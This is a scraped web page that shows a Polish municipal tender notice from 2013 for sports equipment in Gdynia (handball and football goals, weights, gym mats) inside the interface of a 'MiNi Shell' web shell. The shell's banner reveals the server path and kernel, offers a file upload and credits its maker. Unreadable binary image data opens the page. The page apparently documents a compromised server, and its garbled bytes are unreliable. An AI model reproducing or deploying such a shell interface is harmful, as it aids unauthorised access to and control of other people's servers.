JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131129/257565-N-2013.html

<p class="kh_header"><b>Gdynia: Dostawa sprzętu sportowego dla potrzeb Gdyńskiego Ośrodka Sportu i Rekreacji</b><br>
<b>Numer ogłoszenia: 257565 - 2013; data zamieszczenia: 29.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdyński Ośrodek Sportu i Rekreacji , ul. Olimpijska 5/9, 81-538 Gdynia, woj. pomorskie, tel. 058 6223574, faks 058 6223574.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdyniasport.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu sportowego dla potrzeb Gdyńskiego Ośrodka Sportu i Rekreacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia zgodnie z CPV sklasyfikowany jest jako: 37400000-2 artykuły i sprzęt sportowy, 37410000-5 sprzęt sportowy do uprawiania sportów na wolnym powietrzu.
2.Przedmiotem zamówienia jest dostarczenie (sprzedaż) fabrycznie nowego, nie używanego, kompletnego sprzętu sportowego dla potrzeb Gdyńskiego Ośrodka Sportu i Rekreacji. 
3.Wykonawca w ramach zamówienia zobowiązany będzie dostarczyć:
1)bramki do piłki ręcznej profesjonalne aluminiowe - 2 sztuki, o wymiarach: 3x2m; norma ihf. głębokość bramki 100 góra/130 dół cm, bramki muszą posiadać łuki składane, umożliwiające łatwe przenoszenie i magazynowanie bramek, wzmocnione winkle, specjalną konstrukcję winkli oraz zastrzałów stabilizujących bramki, siatka musi być mocowana do dolnej części łuków za pomocą haczyków pp. bramki muszą być mocowane do podłoża w 4 punktach za pomocą dekli podłogowych; bramki muszą posiadać haczyki pp do zawieszania siatki 130 szt., zaślepki oraz dystanse nie niszczące podłogi; bramki muszą być zgodne z przepisami ZPRP, EHF, normą PN-EN 749:2006 oraz muszą posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta,
2)siatki do bramek do piłki ręcznej, o których mowa w pkt. 1 - 2 sztuki, materiał wykonania: polipropylen, wymiary: grubość splotu 5,0 mm, o oczkach 10x10cm, głębokości siatki: góra 60 cm, dół 80 cm, siatki muszą posiadać dodatkową elastyczną linkę, która umożliwia naprężenie siatki i wyrównanie oczek; kolor: biały, siatki muszą być zgodne z przepisami ZPRP, EHF, normą PN-EN 749:2006,
3)bramki do piłki nożnej - 2 sztuki, w kolorze białym, o wymiarach: 5x2m, głębokość 80/150cm (góra/dół); o owalnym profil aluminiowy 100/120mm - wzmocnionym; słupki bramki muszą być montowane w tulejach; siatka musi być mocowana do ramy głównej za pomocą haczyków z tworzywa sztucznego (haczyki w zestawie), pałąki podtrzymujące siatkę muszą być składane; bramki muszą być godne z przepisami FIFA, PZPN oraz normą PN-EN 748:2006 oraz muszą posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta,
4)siatki do bramek do piłki nożnej, o których mowa w pkt. 3 - 2 sztuki, o wymiarach 205x510 cm, głębokości góra/dół: 80/150 cm, o oczkach 10x10cm, o grubości splotu 4 mm, siatki muszą być wykonane z polipropylenu bezwęzłowego, kolor: biały, siatki muszą być godne z przepisami FIFA, PZPN oraz normą PN-EN 748:2006,
5)poprzeczki do skoku o tyczce - 5 sztuk, o długości 450 cm, poprzeczki muszą być wykonane z włókna szklanego, posiadać gumowe końcówki, być wysoce elastyczna, odporna na złamanie i wszelkie uszkodzenia mechaniczne, poprzeczki muszą być godne z przepisami PZLA oraz z obowiązującą normą PN-EN, posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta oraz świadectwo PZLA,
6)poprzeczki do skoku wzwyż - 5 sztuk, o długości 400 cm, poprzeczki muszą być wykonane z włókna szklanego, posiadać gumowe końcówki, być wysoce elastyczne, odporne na złamanie i wszelkie uszkodzenia mechaniczne, poprzeczki muszą być godne z przepisami PZLA oraz obowiązującą normą PN-EN, posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta oraz świadectwo PZLA,
7)materace gimnastyczne - 10 sztuk, o wymiarach każdy długość/szerokość/grubość  - 200x120x10cm, kolor: granat, materiał wykonania: pokrycie materacy PCV, skaden, skaj, materace muszą posiadać wszyte wzmocnione narożniki, wypełnienie pianką poliuretanową wysokogatunkową, dół materacy musi być antypoślizgowy, materace muszą być zamykane na zamek błyskawiczny, materace muszą być zgodne z normą PN-EN 12503-1:2013-07E, oraz posiadać certyfikat bezpieczeństwa,
8)talerze techniczne Bumper Plate o wadze 20 kg każdy - 4 sztuki, przeznaczone do treningu podnoszenia ciężarów (podrzutu i rwania) oraz cross fit, muszą być wykonane z wysokiej jakości gumy pozwalającej na zrzucanie sztangi na podłoże bez narażenia jej na uszkodzenia, talerze muszą być godne obowiązującą normą PN-EN , posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta,
9)talerze techniczne Bumper Plate o wadze 15 kg każdy - 2 sztuki, przeznaczone do treningu podnoszenia ciężarów (podrzutu i rwania) oraz cross fit, muszą być wykonane z wysokiej jakości gumy pozwalającej na zrzucanie sztangi na podłoże bez narażenia jej na uszkodzenia, talerze muszą być godne obowiązującą normą PN-EN , posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta,
10)talerze techniczne Bumper Plate o wadze 10 kg każdy - 2 sztuki, przeznaczone do treningu podnoszenia ciężarów (podrzutu i rwania) oraz cross fit, muszą być wykonane z wysokiej jakości gumy pozwalający na zrzucanie sztangi na podłoże bez narażenia jej na uszkodzenia, talerze muszą być godne obowiązującą normą PN-EN , posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta,
11)gryf olimpijski - 1 sztuka; musi być wykonany z wysokiej jakości stali sprężynowej, według specyfikacji IWF (International Weightlifting Federation), posiadać precyzyjnie kalibrowaną wagę; posiadać system łożysk w tulei pozwalający na rzucanie sztangi na pomost bez jej uszkodzenia; wymiary: długość/ średnica/ średnica tulei /waga:  2200mmx28mmx50mmx20kg, gryf musi być zgodny obowiązującą normą PN-EN , posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta, Zamawiający w załączniku nr 7 do SIWZ umieścił przykładowe zdjęcie urządzenia,
12)maty pod sztangę - o łącznej powierzchni 6 m2, specjalne antypoślizgowe maty gumowe w kolorze czarnym z systemem Dowela, maty muszą być zgodne obowiązującą normą PN-EN , posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta, 
13)urządzenie Rack - 1 sztuka, urządzenie do prowadzenia intensywnych treningów z dużym obciążeniem przy użyciu sztangi, musi zapewniać bezpieczeństwo podczas samotnych treningów, umożliwiać w każdym momencie szybkie odłożenie sztangi na haki asekuracyjne, posiadać stabilną podstawę, 36 poziomów regulacji wysokości, 3 systemy asekuracji, posiadać drążek z 4 uchwytami, umożliwiać montaż dodatkowych modułów; konstrukcja: profil około 80x60x2 mm i około 50x50x2 mm, o wytrzymałości minimum 800 kg, urządzenie musi być zgodny obowiązującą normą PN-EN , posiadać certyfikat bezpieczeństwa lub deklarację zgodności producenta, Zamawiający w załączniku nr 7 do SIWZ umieścił przykładowe zdjęcie urządzenia,
14)trener równowagi - elastyczny (kolor zielony) - 1 sztuka - typu Thera Band lub równoważny, o wymiarach około 35x20x4cm, musi być przeznaczony do ćwiczeń kończyn dolnych, korekcji wad postawy, w celu poprawy koordynacji i równowagi, 
15)trener równowagi - wysoko elastyczny (kolor niebieski) - 1 sztuka - typu Thera Band lub równoważny, o wymiarach około 42x25x5cm, musi być przeznaczony do ćwiczeń kończyn dolnych, korekcji wad postawy, w celu poprawy koordynacji i równowagi, 
16)trener równowagi - wypełniony powietrzem (kolor czarny) - 1 sztuka  - typu Thera Band lub równoważny, o wymiarach około 45x36x7cm, jedna strona musi posiadać gładką powierzchnię, druga musi być wyposażona w miękkie kolce, wysoko elastyczny trener musi być przeznaczony do ćwiczeń kończyn dolnych, korekcji wad postawy, w celu poprawy koordynacji i równowagi,
17)trampolina do ćwiczeń - 1 sztuka - urządzenie przeznaczone do treningów aerobowych oraz wspomagających trening równowagi, urządzenie musi posiadać bardzo stabilną konstrukcję, osłonę przed uderzeniem, o średnicy około 102 cm, obciążeniu maksymalne 150 kg, musi posiadać 6 nóżek zakończonych gumą antypoślizgową, urządzenie musi posiadać certyfikat bezpieczeństwa TUV i GS,
18)platforma do ćwiczeń równowagi i sensomotoryki - 1 sztuka - typu Ortostabil lub równoważny, urządzenie przeznaczone do ćwiczeń koordynacyjnych, stabilizacyjnych i kształtujących nawyk prawidłowej postawy ciała.
4.Podane w SIWZ nazwy sprzętu sportowego należy traktować jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych. Oznacza to, że Wykonawca może zaoferować własny sprzęt sportowy zgodnie ze swoją ofertą handlową (materiały, kolor) z zastrzeżeniem, że sprzęt ten musi być o standardzie , co najmniej takim samym lub wyższym od opisanych w materiałach przetargowych.
5.Zaoferowany sprzęt sportowy, który zostanie dostarczony przez Wykonawcę powinien posiadać opinię stwierdzającą zgodność sprzętu sportowego z wymogami dotyczącymi bezpieczeństwa i higieny użytkowania zgodnie z ustawą z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produktów (t.j. Dz. U. z 2003 Nr 229 poz. 2275 z późn. zm.). Ponadto sprzęt musi posiadać dowód dopuszczenia do obrotu na rynku polskim oraz musi być oznakowany odpowiednim znakiem.
6.Zamawiający informuje, iż ilości przedmiotów wskazane w ust. 3 są ilościami szacowanymi (przewidywanymi przez Zamawiającego). Zamawiający zastrzega sobie prawo do niewykorzystania w całości ilości zamówienia, jeżeli wynikać to będzie z jego faktycznych potrzeb w zakresie przedmiotu umowy. Z tytułu zmniejszenia ilości zamówienia Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego.
7.Wymagania co do sposobu świadczenia dostawy:
1)dostawa przedmiotu zamówienia będzie realizowana sukcesywnie, zgodnie z zapotrzebowaniem  Zamawiającego i na każdorazowe jego wezwanie,
2)przy każdorazowym zamówieniu Zamawiający będzie miał możliwość dowolnego wyboru ilości produktów, o których mowa w ust. 3.
3)dostawy przedmiotu zamówienia realizowane będą w ciągu 48 godzin od momentu złożenia zapotrzebowania /zgłoszenie telefonicznie potwierdzone faksem/ i dostarczane bezpośrednio do siedziby Zamawiającego, w godzinach urzędowania tj. pomiędzy 8.00 a 15.30, w przypadku zgłoszenia zapotrzebowania w piątek dostawa nastąpi w najbliższy poniedziałek do godz. 12:00,
4)w przypadku stwierdzenia niezgodności ilościowych, pomyłek, uszkodzenia lub wad jakościowych otrzymanego towaru Zamawiający postawi towar do dyspozycji Wykonawcy, oraz niezwłocznie/zgłoszenie telefoniczne potwierdzone faksem/ powiadomi Wykonawcę o stwierdzonych brakach i wadach w towarze,
5)Wykonawca będzie zobowiązany w terminie maksymalnie 24 godzin od wpłynięcia reklamacji dostarczyć zastępczą partię towaru bezpośrednio do siedziby Zamawiającego, w godzinach jego urzędowania tj. pomiędzy 8.00 a 15.30,
6)wykaz osób upoważnionych do składania zapotrzebowania i odbioru towaru oraz do podpisywania i odbioru faktur w imieniu Zamawiającego zawierać będzie załącznik nr 1 do umowy,
7)Wykonawca zobowiązany będzie do realizacji dostaw na własny koszt, przy udziale własnego środka transportu lub może zlecić dostawę innemu przewoźnikowi,
8)Wykonawca zobowiązany jest należycie zabezpieczyć towar na czas transportu oraz ponosi całkowitą odpowiedzialność za dostawę towaru,
9)odebranie poszczególnej partii sprzętu nastąpi pisemnie protokołem zdawczo - odbiorczym,
10)do odbioru, o którym mowa w pkt. 8 Wykonawca zobowiązany będzie do złożenia: 
a)dokumentacji technicznej danego urządzenia składającej się między innymi z rysunków i opisu technicznego,
b)instrukcji montażu/składania danego urządzenia,
c)instrukcji użytkowania w języku polskim danego urządzenia,
d)certyfikatu bezpieczeństwa lub deklarację zgodności producenta (jeżeli dotyczy),
e)dokumentu potwierdzającego zgodność danego urządzenia z obowiązującą normą (jeżeli dotyczy).
8.Wykonawca zobowiązany jest udzielić rocznej gwarancji i rękojmi za wady na zaoferowany towar. Termin liczony jest osobno dla poszczególnych partii towaru, liczony od daty dostawy poszczególnych partii sprzętu sportowego.
9.Zamawiający dopuszcza realizację zamówienia przez podwykonawców. Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi pełną odpowiedzialność za prace wykonane przez podwykonawców również za usterki gwarancyjne.
10.Zamawiający nie przewiduje zawarcia umowy ramowej.
11.Zamawiający nie ustanawia dynamicznego systemu zakupów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 37.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu wykazania się spełnieniem warunku posiadania niezbędnej wiedzy i doświadczenia, Wykonawca musi wykazać się w całości należytym wykonaniem co najmniej jednej dostawy sprzętu sportowego o charakterze i złożoności porównywalnej do przedmiotu zamówienia, wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie, polegające na dostawie (sprzedaży) sprzętu sportowego na kwotę nie mniejszą niż 5.000,00 zł brutto  (zamówienie mogło być realizowane sukcesywnie wg potrzeb Zamawiającego)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, o którym mowa w Rozdziale 5 ust. 4 Specyfikacja Istotnych Warunków Zamówienia - w oryginale albo w postaci uwierzytelnionej notarialnie kopii; 2)dokumenty dotyczące w szczególności charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem oraz zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia, w przypadku, o którym mowa w Rozdziale 5 ust. 4 Specyfikacja Istotnych Warunków Zamówienia - w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; w przypadku, gdy powyższe informacje zostaną zawarte w pisemnym zobowiązaniu, o którym mowa w pkt 1, Wykonawca nie musi przedkładać przedmiotowych dokumentów;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w sytuacjach, gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w szczególności w następujących przypadkach:
1)omyłek pisarskich lub błędów rachunkowych, 
2)mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, 
3)konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych,
4)konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę, 
5)jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
6)zmiana wartości brutto wynagrodzenia Wykonawcy w przypadku zmiany ustawowej wysokości podatku od towarów i usług,
7)innych zmian korzystnych dla Zamawiającego, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gdyniasport.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GDYŃSKI OŚRODEK SPORTU I REKREACJI 81 - 538 Gdynia, ul. Olimpijska 5/9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2013 godzina 09:30, miejsce: Sekretariat Gdyńskiego Ośrodka Sportu i Rekreacji 81 - 538 Gdynia, ul. Olimpijska 5/9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com